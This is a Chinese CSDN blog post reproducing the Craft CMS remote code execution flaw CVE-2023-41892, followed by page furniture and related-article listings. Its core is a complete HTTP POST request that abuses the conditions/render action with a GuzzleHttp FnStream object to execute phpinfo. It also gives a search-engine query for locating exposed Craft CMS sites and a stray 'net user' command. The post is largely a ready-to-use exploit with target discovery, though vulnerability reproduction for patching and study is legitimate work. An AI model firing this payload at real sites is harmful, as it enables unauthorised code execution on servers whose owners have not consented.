【漏洞复现】craft cms 远程代码执行漏洞CVE-2023-41892

已于 2023-10-30 15:22:51 修改
阅读量1.5k 收藏 3
点赞数 3
分类专栏: 漏洞复现 文章标签: web安全 网络安全
于 2023-10-18 16:16:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60614981/article/details/133908121
版权

漏洞描述

Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞。

影响版本

4.0.0-RC1 <= Craft CMS <= 4.4.14

搜索语句

title="Welcome to Craft CMS"

漏洞详情

POST /index.php HTTP/2
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

在这里插入图片描述

net user
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Craft CMS 远程代码执行漏洞(含批量验证poc)
weixin_43567873的博客
04-18 133
Craft CMS 远程代码执行漏洞(含批量验证poc)
craft-translations:轻松管理您的Craft CMS网站翻译
04-07
Craft CMS 3.x的翻译插件 系统要求 Craft CMS 3.6.0或更高版本。 PHP 7.2以上 PHP 扩展 安装 提醒:在安装翻译插件或进行任何更改以支持Craft的多站点设置之前,建议确保Craft站点的备份是最新的。 还建议在生产...
CVE-2023-41892 漏洞
Jay17的博客
02-14 1421
CVE-2023-41892 漏洞
探索创新的 Craft CMS:打造定制化数字体验的新标准
最新发布
gitblog_00040的博客
06-02 241
探索创新的 Craft CMS:打造定制化数字体验的新标准 项目地址:https://gitcode.com/craftcms/craft Craft CMS 是一款灵活且用户友好的内容管理系统,它旨在为网络甚至更远的地方创造独特的数字体验。这个自托管的PHP 8应用程序由MySQL或Postgres数据库支持,提供了一种全新的网站和应用内容管理方式。 项目介绍 Craft 不仅仅是一个CMS,它...
【渗透测试】Surveillance - HackTheBox,网络摄像头渗透+SSH端口转发访问本地资源
m0_74272345的博客
12-15 1223
一个网络摄像头的靶机,部署craftcms WEB服务,本地部署zoneminder服务视频监控web一眼看到是Craft CMS,之前ACTF差不多,直接拿GitHub里面的POC一把梭,拿到www-data权限在Web目录下找到一个数据库备份文件,保存下来在自己的本地重建数据库,发Matthew用户的hash,密码用拿到matthew的权限linpeas自动枚举发很多信息指向zoneminder,针对性的搜索发zoneminder用nginx部署在本地,使用SSH端口转发。
[漏洞] Craft (CVE-2023-41892)
k5664524的博客
01-17 447
Craft CMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞Craft CMS 是一个用于创建数字体验的平台。这是一种高影响力、低杂性的攻击媒介。
HTB | Surveillance CVE-2023-41892 CVE-2023-26035
q
12-24 995
BusyBox 包含了一些简单的工具,例如ls、cat和echo等等,还包含了一些更大、更杂的工具,例grep、find、mount以及telnet。在/var/www/html/craft/storage/backups中发一个sql的压缩包,使用python开启http服务,访问并下载文件。使用hash-identifier识别hash属性,识别出来为SHA-256,Haval-256。使用sudo执行shell脚本 pass中的密码是上文linpeas找到的。1888吉利数保存一下。
代码审计】iZhanCMS_v2.1 代码执行漏洞分析
12-03 481
  0x00 环境准备 iZhanCMS官网:http://www.izhancms.com 网站源码版本:爱站CMS(zend6.0) V2.1 程序源码下载:http://www.izhancms.com/category/Category/index/cid/1 默认后台:http://127.0.0.1/admin/admin/index 默认用户名:admin  密...
bugku 管理员系统 后台代码_帝国cms远程代码执行漏洞1
weixin_39710396的博客
11-08 326
点击蓝字关注我们帝国cms远程代码执行漏洞-1帝国cms简介《帝国网站管理系统》英文译为"Empire CMS",简称"Ecms",它是基于B/S结构,且功能强大,帝国CMS-logo易用的网站管理系统。系统由帝国开发工作组独立开发,是一个经过完善设计的适用于Linux/windows/Unix等环境下高效的网站解决方案。这次我们将给出此系统中的两个漏洞,对漏洞原理进行分...
帝国CMS7.5任意代码执行漏洞报告
小赵同学的博客
03-01 1420
描述 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实任意代码执行(需要弄到管理员权限登录到后台) 漏洞 源码下载:http://www.phome.net/ 下载后访问/upload/e/install/index.php进行安装 这里我已经安装过了 步骤 设置好基础配置登录后台,进行漏洞 打开抓包软件设置好代理准备抓包 点击确定 修改后 》 放包 点击备份数据目录》点击查看备份说明 修改后路径 查看目录文件 uploa
Portal:门户网站为Craft CMS带来了高级实时预览功能
05-23
门户网站为Craft CMS带来了高级的实时预览功能。 在主要的“实时预览”窗口中,在设备仿真器上的平板电脑和移动设备上预览您的内容,并添加其他目标模板供用户切换。 。 在插件商店中可用,价格为29美元。 要求 ...
craftcms-bootstrap:简化Craft CMS引导和配置
05-11
Craft CMS引导带 它能做什么 通过将常见任务抽象为简单的api来减少用于引导和配置的样板。 由。 引导程序 例如@webroot/index.php 将您的应用程序引导样板代码简化为单个可链接的语句。 这在处理多个访问点(例如,,)时,对于实一致性特别有用。 设置,并具有合理的后备。 优雅地加载.env文件环境变量。 配置文件 例如@root/config/general.php或任何 使用后备和检索环境变量。 例如: export MY_BOOL=true → bool export MY_INT=3 → int 如果您的配置依赖HTTP请求标头,则提供对HTTP请求标头的访问(通过yii\web\Request )。 提供将整个配置映射到任何匹配/前缀环境变量的方法。 例如, $config['allowAutoUpdates']将匹配环境中的CRAFT_ALL
simple-text:Craft CMS 的简单 textarea 字段类型
08-04
Craft CMS 的简单文本这个插件为 Craft 添加了一个新的“简单文本”字段类型,它提供了一个为输入文档而优化的文本区域。文本区域功能使用固定宽度字体自动调整大小使用要求此插件需要 Craft CMS 3.0.0-beta.20 或更...
craft-phone-number:Craft CMS的电话号码字段
04-29
Craft CMS的电话号码字段 此插件向Craft中添加了一个新的字段类型,用于输入电话号码以及用于...composer require rynpsc/craft-phone-number # Tell Craft to install the plugin ./craft install/plugin phone-number
craft-diywidget:Craft CMS的“自己动手”小部件
05-07
> composer require carlcs/craft-diywidget > ./craft install/plugin diy-widget 入门 使用此插件构建自己的窗口小部件非常容易。 您需要做的就是在config文件夹中创建一个名为diy-widget的新文件夹,并向其中...
plugin-installer:Craft CMS插件的Composer安装程序
05-10
适用于Composer的Craft CMS插件安装程序 这是插件的Composer安装... 它实了一个名为craft-plugin的新Composer软件包类型,所有Craft插件都应使用该类型。 有关如何为Craft CMS创建插件的完整详细信息,可以在找到。
漏洞-骑士cms-代码执行】vulfocus/骑士cms_cve_2020_35339
10-13 1705
【骑士cms-代码执行】植入到可执行的文件中
探索优雅的内容管理系统:Craft CMS
gitblog_00078的博客
05-11 435
探索优雅的内容管理系统:Craft CMS 项目地址:https://gitcode.com/craftcms/cms Craft CMS 是一款创新的、用户友好的内容管理系统,专为打造定制化数字体验而设计,无论是在网页上还是更广阔的互联网领域。它的强大功能和灵活性使其在众多CMS中脱颖而出。 项目介绍 Craft CMS 的核心亮点在于其直观的控制面板,让内容创建和管理变得轻松简单。它允许您自由...
craft-mnn 文本检测
12-21
Craft-mnn 是一种用于文本检测的工具,能够快速而准确地识别图片中的文本区域,并将其提取出来。该工具使用了最先进的深度学习技术,能够适应各种杂的场景和文本形式,包括各种字体、大小、颜色和背景。 Craft-mnn 在文本检测方面具有几个显著的优势。首先,其速度非常快,可以在短短几毫秒内完成对整个图片的文本区域识别。其次,它具有很高的准确性,可以准确地将文本区域与其他区域分离开来,无论是水平、垂直还是倾斜的文本都可以被有效地检测出来。此外,Craft-mnn 还可以处理各种杂的场景,包括模糊、遮挡、光照不均等情况,而且对于不同语种的文本也都能够进行有效的识别。 总的来说,Craft-mnn 是一种非常有效的文本检测工具,适用于各种需要对图片中的文本进行识别和提取的场景。它能够在保证速度的同时保持着高准确性,对于各种杂的图片场景都具有很好的适应能力,因此受到了广泛的应用和好评。无论是在商业领域的文档识别、自动驾驶领域的道路标识识别,还是在安防领域的监控画面分析,Craft-mnn 都能够发挥其强大的功能,为用户提供高效便捷的文本识别服务。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值